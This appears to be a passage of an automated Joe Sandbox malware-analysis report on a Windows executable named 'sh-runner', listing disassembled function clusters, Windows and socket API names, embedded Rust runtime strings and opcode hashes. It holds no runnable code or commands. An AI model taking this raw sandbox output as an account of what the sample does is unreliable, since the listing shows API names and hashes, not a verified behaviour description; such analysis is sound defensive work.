                                                                      • Associated: 00000002.00000002.3056493448.00007FF72BD6D000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000002.00000002.3056522131.00007FF72BDA5000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000002.00000002.3056538929.00007FF72BDA6000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000002.00000002.3056555538.00007FF72BDA9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_7ff72bcd0000_sh-runner.jbxd
                                                                      Similarity
                                                                      • API ID: CloseHandle$File$CreateMappingView
                                                                      • String ID:
                                                                      • API String ID: 1771758222-0
                                                                      • Opcode ID: 4b946a78d64c3cee64e25fe7fa159cd530b1d760f7afde8bcb70e86244d2371d
                                                                      • Instruction ID: 772b0b5ce2651370756ec4d64c8cebd14c539547c8fb9d022aea17b1119114ce
                                                                      • Opcode Fuzzy Hash: 4b946a78d64c3cee64e25fe7fa159cd530b1d760f7afde8bcb70e86244d2371d
                                                                      • Instruction Fuzzy Hash: F351C432B08B4286FB18EB59E8447EDA6A0FF49B94F948039DE5C07796DF3DD5828710
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.3056420438.00007FF72BCD1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF72BCD0000, based on PE: true
                                                                      • Associated: 00000002.00000002.3056403973.00007FF72BCD0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000002.00000002.3056475975.00007FF72BD6C000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000002.00000002.3056493448.00007FF72BD6D000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000002.00000002.3056522131.00007FF72BDA5000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000002.00000002.3056538929.00007FF72BDA6000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000002.00000002.3056555538.00007FF72BDA9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_7ff72bcd0000_sh-runner.jbxd
                                                                      Similarity
                                                                      • API ID: CloseHandle
                                                                      • String ID: program path has no file name
                                                                      • API String ID: 2962429428-697003637
                                                                      • Opcode ID: b645622684179f8fa3b2ecf66bb67c7c8431540330c75a7dd647d430661c3de5
                                                                      • Instruction ID: 95956c95bf51f0ab718b01f47aca4bf33a4375c68570954c7467475f4e125175
                                                                      • Opcode Fuzzy Hash: b645622684179f8fa3b2ecf66bb67c7c8431540330c75a7dd647d430661c3de5
                                                                      • Instruction Fuzzy Hash: A3518765A1854285EB68BB7DDC403FD9350EF85B88FC41436DE0D4B7A6CE3DE5819B20
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.3056420438.00007FF72BCD1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF72BCD0000, based on PE: true
                                                                      • Associated: 00000002.00000002.3056403973.00007FF72BCD0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000002.00000002.3056475975.00007FF72BD6C000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000002.00000002.3056493448.00007FF72BD6D000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000002.00000002.3056522131.00007FF72BDA5000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000002.00000002.3056538929.00007FF72BDA6000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000002.00000002.3056555538.00007FF72BDA9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_7ff72bcd0000_sh-runner.jbxd
                                                                      Similarity
                                                                      • API ID: CloseHandle
                                                                      • String ID:
                                                                      • API String ID: 2962429428-0
                                                                      • Opcode ID: 6063ef6a35550308bd84fe7ea6daae55b4702e1d0406f7726d112292e084be9a
                                                                      • Instruction ID: 1cf557daafffaf4d303bd2b69f492d21f7aa863190307c2d7d816e2b862ffa52
                                                                      • Opcode Fuzzy Hash: 6063ef6a35550308bd84fe7ea6daae55b4702e1d0406f7726d112292e084be9a
                                                                      • Instruction Fuzzy Hash: A041F351F0868241FE0CB76E99143F99651EF89BC8F888435DE0C07BA6DE6CE5C68B20
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.3056420438.00007FF72BCD1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF72BCD0000, based on PE: true
                                                                      • Associated: 00000002.00000002.3056403973.00007FF72BCD0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000002.00000002.3056475975.00007FF72BD6C000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000002.00000002.3056493448.00007FF72BD6D000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000002.00000002.3056522131.00007FF72BDA5000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000002.00000002.3056538929.00007FF72BDA6000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000002.00000002.3056555538.00007FF72BDA9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_7ff72bcd0000_sh-runner.jbxd
                                                                      Similarity
                                                                      • API ID: ErrorLast$HandleInformationSocketclosesocket
                                                                      • String ID:
                                                                      • API String ID: 1159780279-0
                                                                      • Opcode ID: b938f4549eabdc51a0458d546100953ac200c90f34d34bb03aece01258d68e6c
                                                                      • Instruction ID: 99e6b14e2cce8a996a89e9ef45bf94dd54cff2acccbdf75b51e801db8e23feb3
                                                                      • Opcode Fuzzy Hash: b938f4549eabdc51a0458d546100953ac200c90f34d34bb03aece01258d68e6c
                                                                      • Instruction Fuzzy Hash: AE11E721F184A146F738657D6805BE59580EBC83F8F981334EE7C477E6DD7DA8864E10
                                                                      APIs
                                                                      Strings
                                                                      • R8_F, xrefs: 00007FF72BD35780
                                                                      • R8_U, xrefs: 00007FF72BD3574B
                                                                      • R9_F, xrefs: 00007FF72BD35799
                                                                      • R9_U, xrefs: 00007FF72BD35767
                                                                      • TPIDPRHTPIDPRSPLRPCACC0ACC1ACC2ACC3ACC4ACC5ACC6ACC7S0S1S2S3S4S5S6S7S8S9S10S11S12S13S14S15S16S17S18S19S20S21S22S23S24S25S26S27S28S29S30S31X0X1X2X3X4X5X6X7X8X9X10X11X12X13X14X15X16X17X18X19X20X21X22X23X24X25X26X27X28X29X30ELR_modeRA_SIGN_STATETPIDRRO_EL0TPIDR_EL, xrefs: 00007FF72BD357B2
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.3056420438.00007FF72BCD1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF72BCD0000, based on PE: true
                                                                      • Associated: 00000002.00000002.3056403973.00007FF72BCD0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000002.00000002.3056475975.00007FF72BD6C000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000002.00000002.3056493448.00007FF72BD6D000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000002.00000002.3056522131.00007FF72BDA5000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000002.00000002.3056538929.00007FF72BDA6000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000002.00000002.3056555538.00007FF72BDA9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_7ff72bcd0000_sh-runner.jbxd
                                                                      Similarity
                                                                      • API ID: memcmp
                                                                      • String ID: R8_F$R8_U$R9_F$R9_U$TPIDPRHTPIDPRSPLRPCACC0ACC1ACC2ACC3ACC4ACC5ACC6ACC7S0S1S2S3S4S5S6S7S8S9S10S11S12S13S14S15S16S17S18S19S20S21S22S23S24S25S26S27S28S29S30S31X0X1X2X3X4X5X6X7X8X9X10X11X12X13X14X15X16X17X18X19X20X21X22X23X24X25X26X27X28X29X30ELR_modeRA_SIGN_STATETPIDRRO_EL0TPIDR_EL
                                                                      • API String ID: 1475443563-1802361725
                                                                      • Opcode ID: f551b046c624ded6a021d9b272614563cc3dd94d28dc6351541a9b3b15702328
                                                                      • Instruction ID: 3a92941c7433b1227fd0935746fd409b0412de31de987ca95dc521887453fe9c
                                                                      • Opcode Fuzzy Hash: f551b046c624ded6a021d9b272614563cc3dd94d28dc6351541a9b3b15702328
                                                                      • Instruction Fuzzy Hash: 1D110432A0804286F77CAE3C98511FEA5E0DB18755F84443ADB9F8A2D2DD7CF4899F64
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.3056420438.00007FF72BCD1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF72BCD0000, based on PE: true
                                                                      • Associated: 00000002.00000002.3056403973.00007FF72BCD0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000002.00000002.3056475975.00007FF72BD6C000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000002.00000002.3056493448.00007FF72BD6D000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000002.00000002.3056522131.00007FF72BDA5000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000002.00000002.3056538929.00007FF72BDA6000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000002.00000002.3056555538.00007FF72BDA9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_7ff72bcd0000_sh-runner.jbxd
                                                                      Similarity
                                                                      • API ID: Value$AddressErrorLastWait
                                                                      • String ID: use of std::thread::current() is not possible after the thread's local data has been destroyedstd\src\thread\mod.rs
                                                                      • API String ID: 1881407604-459553403
                                                                      • Opcode ID: fbf02877470affe050ffdbb8edb95464c21b913d93ddea9765e51dac9e51792e
                                                                      • Instruction ID: 3e35c2db9fce0ba9d42cca2846c74012bb8235880a4a407580fcd01f8f8a841c
                                                                      • Opcode Fuzzy Hash: fbf02877470affe050ffdbb8edb95464c21b913d93ddea9765e51dac9e51792e
                                                                      • Instruction Fuzzy Hash: C251E222F0894299FB19BB6C9C112FDA665EB40754FC88176DE0D57BE5DE3CB1828B20
                                                                      APIs
                                                                      Strings
                                                                      • assertion failed: len >= mem::size_of::<c::sockaddr_in>()std\src\sys_common\net.rs, xrefs: 00007FF72BD22C30
                                                                      • TcpListenerUdpSocket.debug_abbrev.dwo.debug_info.dwo.debug_line.dwo.debug_loc.dwo.debug_loclists.dwo.debug_rnglists.dwo.debug_str.dwo.debug_str_offsets.dwo.debug_types.dwostd\src\..\..\backtrace\src\symbolize\gimli.rs, xrefs: 00007FF72BD22C88
                                                                      • assertion failed: len >= mem::size_of::<c::sockaddr_in6>(), xrefs: 00007FF72BD22C48
                                                                      • addr, xrefs: 00007FF72BD22D21
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.3056420438.00007FF72BCD1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF72BCD0000, based on PE: true
                                                                      • Associated: 00000002.00000002.3056403973.00007FF72BCD0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000002.00000002.3056475975.00007FF72BD6C000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000002.00000002.3056493448.00007FF72BD6D000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000002.00000002.3056522131.00007FF72BDA5000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000002.00000002.3056538929.00007FF72BDA6000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000002.00000002.3056555538.00007FF72BDA9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_7ff72bcd0000_sh-runner.jbxd
                                                                      Similarity
                                                                      • API ID: ErrorLast
                                                                      • String ID: TcpListenerUdpSocket.debug_abbrev.dwo.debug_info.dwo.debug_line.dwo.debug_loc.dwo.debug_loclists.dwo.debug_rnglists.dwo.debug_str.dwo.debug_str_offsets.dwo.debug_types.dwostd\src\..\..\backtrace\src\symbolize\gimli.rs$addr$assertion failed: len >= mem::size_of::<c::sockaddr_in6>()$assertion failed: len >= mem::size_of::<c::sockaddr_in>()std\src\sys_common\net.rs
                                                                      • API String ID: 1452528299-1398425720
                                                                      • Opcode ID: c9fb1dc49f0c6a3f39c471d5885720b195e0b6d05b32bbbf8232a37ce6ef8813
                                                                      • Instruction ID: 7bf2ffdc2b167850e5ba0bd8526918a8b0356b7f17b095444d7354732a8a5e7f
                                                                      • Opcode Fuzzy Hash: c9fb1dc49f0c6a3f39c471d5885720b195e0b6d05b32bbbf8232a37ce6ef8813
                                                                      • Instruction Fuzzy Hash: F6619126A1869285F729AF58E8413FCA370EF44758F848136EE8D13766EF3CA685C750
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.3056420438.00007FF72BCD1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF72BCD0000, based on PE: true
                                                                      • Associated: 00000002.00000002.3056403973.00007FF72BCD0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000002.00000002.3056475975.00007FF72BD6C000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000002.00000002.3056493448.00007FF72BD6D000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000002.00000002.3056522131.00007FF72BDA5000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000002.00000002.3056538929.00007FF72BDA6000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000002.00000002.3056555538.00007FF72BDA9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_7ff72bcd0000_sh-runner.jbxd
                                                                      Similarity
                                                                      • API ID: memcpy
                                                                      • String ID: PATHstd\src\sys_common\process.rs$assertion failed: self.height > 0
                                                                      • API String ID: 3510742995-122754119
                                                                      • Opcode ID: 954c6353572963fa527ae682fe59735aeb8cddd5bd717976e8cd1ae11293ecb5
                                                                      • Instruction ID: 49a2197b6097e2a3afe20ccdee822330b5caf9710058ef63a9fe52293644fbe7
                                                                      • Opcode Fuzzy Hash: 954c6353572963fa527ae682fe59735aeb8cddd5bd717976e8cd1ae11293ecb5
                                                                      • Instruction Fuzzy Hash: D322B622A04BD285E726AF29D8413F9A7A0FF54B98F884531DE4D177A6EF38D2C5C710
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.3056420438.00007FF72BCD1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF72BCD0000, based on PE: true
                                                                      • Associated: 00000002.00000002.3056403973.00007FF72BCD0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000002.00000002.3056475975.00007FF72BD6C000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000002.00000002.3056493448.00007FF72BD6D000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000002.00000002.3056522131.00007FF72BDA5000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000002.00000002.3056538929.00007FF72BDA6000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000002.00000002.3056555538.00007FF72BDA9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_7ff72bcd0000_sh-runner.jbxd
                                                                      Similarity
                                                                      • API ID: ErrorLast
                                                                      • String ID:
                                                                      • API String ID: 1452528299-0
                                                                      • Opcode ID: d2ba8f167fe8e9c4f7cfaa7e353470eb4328f6a9ab1888e480ecfba10196ba5c
                                                                      • Instruction ID: f97c3ad6773df1c6ce337ea842dc0e19564cd47c72b2de761c9b28e8d78b61f3
                                                                      • Opcode Fuzzy Hash: d2ba8f167fe8e9c4f7cfaa7e353470eb4328f6a9ab1888e480ecfba10196ba5c
                                                                      • Instruction Fuzzy Hash: DF61E291E1825246FB69B63999003F99690EB88BD8FC45131DD5D27BE9CE2DD842CF30
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.3056420438.00007FF72BCD1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF72BCD0000, based on PE: true
                                                                      • Associated: 00000002.00000002.3056403973.00007FF72BCD0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000002.00000002.3056475975.00007FF72BD6C000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000002.00000002.3056493448.00007FF72BD6D000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000002.00000002.3056522131.00007FF72BDA5000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000002.00000002.3056538929.00007FF72BDA6000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000002.00000002.3056555538.00007FF72BDA9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_7ff72bcd0000_sh-runner.jbxd
                                                                      Similarity
                                                                      • API ID: CloseHandle$ErrorLast$DirectorySystem
                                                                      • String ID:
                                                                      • API String ID: 768002510-0
                                                                      • Opcode ID: 0a4ca29d2f8a300a0a0d543ad49635f68eddb652e0a2c4f9f13c6ad2c7ec1f2c
                                                                      • Instruction ID: 8db1eedd738ce2ae07ce955858effc09aa1b194d22e790bf86d6c867bf7381b7
                                                                      • Opcode Fuzzy Hash: 0a4ca29d2f8a300a0a0d543ad49635f68eddb652e0a2c4f9f13c6ad2c7ec1f2c
                                                                      • Instruction Fuzzy Hash: 6F81B122A14ED188E774AF39DC443FA63A0FB44799F801135DA1D9BBE9DF399542CB10
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.3056420438.00007FF72BCD1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF72BCD0000, based on PE: true
                                                                      • Associated: 00000002.00000002.3056403973.00007FF72BCD0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000002.00000002.3056475975.00007FF72BD6C000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000002.00000002.3056493448.00007FF72BD6D000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000002.00000002.3056522131.00007FF72BDA5000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000002.00000002.3056538929.00007FF72BDA6000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000002.00000002.3056555538.00007FF72BDA9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_7ff72bcd0000_sh-runner.jbxd
                                                                      Similarity
                                                                      • API ID: memcpy
                                                                      • String ID: assertion failed: match track_edge_idx { LeftOrRight::Left(idx) => idx <= old_left_len, LeftOrRight::Right(idx) => idx <= right_len,}$assertion failed: new_left_len <= CAPACITY$assertion failed: old_left_len + count <= CAPACITY
                                                                      • API String ID: 3510742995-3535459961
                                                                      • Opcode ID: 4f9eca0a564fd9a118a8043acdcfae24573531f22f77b14d8c68785833c78f72
                                                                      • Instruction ID: a106fd7f795b123f5812ae7e38f14b1a53f3e13022e3d1217496ebafc85f5808
                                                                      • Opcode Fuzzy Hash: 4f9eca0a564fd9a118a8043acdcfae24573531f22f77b14d8c68785833c78f72
                                                                      • Instruction Fuzzy Hash: 25816E32A04BC585E715DF68DC403E973A4FB58B88F948225DE8C17769EF7992D5D300
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.3056420438.00007FF72BCD1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF72BCD0000, based on PE: true
                                                                      • Associated: 00000002.00000002.3056403973.00007FF72BCD0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000002.00000002.3056475975.00007FF72BD6C000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000002.00000002.3056493448.00007FF72BD6D000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000002.00000002.3056522131.00007FF72BDA5000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000002.00000002.3056538929.00007FF72BDA6000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000002.00000002.3056555538.00007FF72BDA9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_7ff72bcd0000_sh-runner.jbxd
                                                                      Similarity
                                                                      • API ID: ConsoleErrorLastWrite$ByteCharMultiWide
                                                                      • String ID:
                                                                      • API String ID: 1956605914-0
                                                                      • Opcode ID: b43c517ede8375b8634f024f2367b67a82169b3cb35f27ec5b2def54cb46485d
                                                                      • Instruction ID: bef4adc7fa7ffffa9471ed2e76cfe4437212540e3d60d813b1f289a4092d1edc
                                                                      • Opcode Fuzzy Hash: b43c517ede8375b8634f024f2367b67a82169b3cb35f27ec5b2def54cb46485d
                                                                      • Instruction Fuzzy Hash: 6C510171E186A245FB29AB38DC443F9E261FB84394FC44131D94D47AE9DF3CA585CB20
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.3056420438.00007FF72BCD1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF72BCD0000, based on PE: true
                                                                      • Associated: 00000002.00000002.3056403973.00007FF72BCD0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000002.00000002.3056475975.00007FF72BD6C000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000002.00000002.3056493448.00007FF72BD6D000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000002.00000002.3056522131.00007FF72BDA5000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000002.00000002.3056538929.00007FF72BDA6000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000002.00000002.3056555538.00007FF72BDA9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_7ff72bcd0000_sh-runner.jbxd
                                                                      Similarity
                                                                      • API ID: CloseHandle
                                                                      • String ID: program path has no file name
                                                                      • API String ID: 2962429428-697003637
                                                                      • Opcode ID: 535f240628111b7be1e2573215e3df11fe582b422e1dfdffbf04f894117b0853
                                                                      • Instruction ID: 7a26ec27ba585dbc47542bd83a5de7b28ffd5551da19018bbbb02ba4d7e56bf6
                                                                      • Opcode Fuzzy Hash: 535f240628111b7be1e2573215e3df11fe582b422e1dfdffbf04f894117b0853
                                                                      • Instruction Fuzzy Hash: 40518865B1858285EB68BB6D9C003F99350EF89BD4FC41436DE0D4B7A5DE3DD5818B20
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.3056420438.00007FF72BCD1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF72BCD0000, based on PE: true
                                                                      • Associated: 00000002.00000002.3056403973.00007FF72BCD0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000002.00000002.3056475975.00007FF72BD6C000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000002.00000002.3056493448.00007FF72BD6D000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000002.00000002.3056522131.00007FF72BDA5000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000002.00000002.3056538929.00007FF72BDA6000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000002.00000002.3056555538.00007FF72BDA9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_7ff72bcd0000_sh-runner.jbxd
                                                                      Similarity
                                                                      • API ID: ErrorLast$connectioctlsocket
                                                                      • String ID:
                                                                      • API String ID: 1971785428-0
                                                                      • Opcode ID: 91752de680eb7810e5663d0e633616ae3bc0b1b21d747f07152cb76fdf5c0dff
                                                                      • Instruction ID: 484bb9a0b74d3df712dbefd9adbe66c4a5bd10612a28d773d19cbedc6ead51e0
                                                                      • Opcode Fuzzy Hash: 91752de680eb7810e5663d0e633616ae3bc0b1b21d747f07152cb76fdf5c0dff
                                                                      • Instruction Fuzzy Hash: 41414932A1869241E778AA79AC403F8B250EB49B94F985136CE5D477A4DF3CF481CF60
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.3056420438.00007FF72BCD1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF72BCD0000, based on PE: true
                                                                      • Associated: 00000002.00000002.3056403973.00007FF72BCD0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000002.00000002.3056475975.00007FF72BD6C000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000002.00000002.3056493448.00007FF72BD6D000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000002.00000002.3056522131.00007FF72BDA5000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000002.00000002.3056538929.00007FF72BDA6000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000002.00000002.3056555538.00007FF72BDA9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_7ff72bcd0000_sh-runner.jbxd
                                                                      Similarity
                                                                      • API ID: ErrorHandleLast$CurrentDuplicateProcess
                                                                      • String ID:
                                                                      • API String ID: 3697983210-0
                                                                      • Opcode ID: a703a5d9bf1d374bf201233f2e3415584f43e3240198f924f84827e9e5f8ce52
                                                                      • Instruction ID: e63daff8a6a12a876e1c5ed5616cb04c2e04449ade3c192eb451cafc03b25b04
                                                                      • Opcode Fuzzy Hash: a703a5d9bf1d374bf201233f2e3415584f43e3240198f924f84827e9e5f8ce52
                                                                      • Instruction Fuzzy Hash: 5C214861B2864140FF28A67A99013FD9651EB89BD0F888139DE6D4B7D5CE3DD4819B20
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.3056420438.00007FF72BCD1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF72BCD0000, based on PE: true
                                                                      • Associated: 00000002.00000002.3056403973.00007FF72BCD0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000002.00000002.3056475975.00007FF72BD6C000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000002.00000002.3056493448.00007FF72BD6D000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000002.00000002.3056522131.00007FF72BDA5000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000002.00000002.3056538929.00007FF72BDA6000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000002.00000002.3056555538.00007FF72BDA9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_7ff72bcd0000_sh-runner.jbxd
                                                                      Similarity
                                                                      • API ID: Handle$ErrorFileInformationLast$Close
                                                                      • String ID:
                                                                      • API String ID: 3114385310-0
                                                                      • Opcode ID: dcc3e9db81ffaae64ca45b346fab4df8695325788677632439c8d9e62b369b85
                                                                      • Instruction ID: 7a5847d94ac7ab56b90fc64982a8b7baa6e7a12f7feb4669afbea51d7e3538f7
                                                                      • Opcode Fuzzy Hash: dcc3e9db81ffaae64ca45b346fab4df8695325788677632439c8d9e62b369b85
                                                                      • Instruction Fuzzy Hash: BF21A871F1864199F729B9B99C003F95650DBC9788FD45031DE4C67BE6CE3DD9828B20
                                                                      APIs
                                                                      • TlsAlloc.KERNEL32(?,?,?,?,?,?,?,?,00000001,00000000,00000000,?,00007FF72BD28445,?,?,?), ref: 00007FF72BD221D3
                                                                      • InitOnceComplete.KERNEL32(?,?,?,?,?,?,?,?,00000001,00000000,00000000,?,00007FF72BD28445,?,?,?), ref: 00007FF72BD2221E
                                                                      Strings
                                                                      • assertion failed: len >= mem::size_of::<c::sockaddr_in>()std\src\sys_common\net.rs, xrefs: 00007FF72BD223C0
                                                                      • assertion failed: len >= mem::size_of::<c::sockaddr_in6>(), xrefs: 00007FF72BD223D8
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.3056420438.00007FF72BCD1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF72BCD0000, based on PE: true
                                                                      • Associated: 00000002.00000002.3056403973.00007FF72BCD0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000002.00000002.3056475975.00007FF72BD6C000.00000004.00000001.01000000.00000005.sdmpDownload File
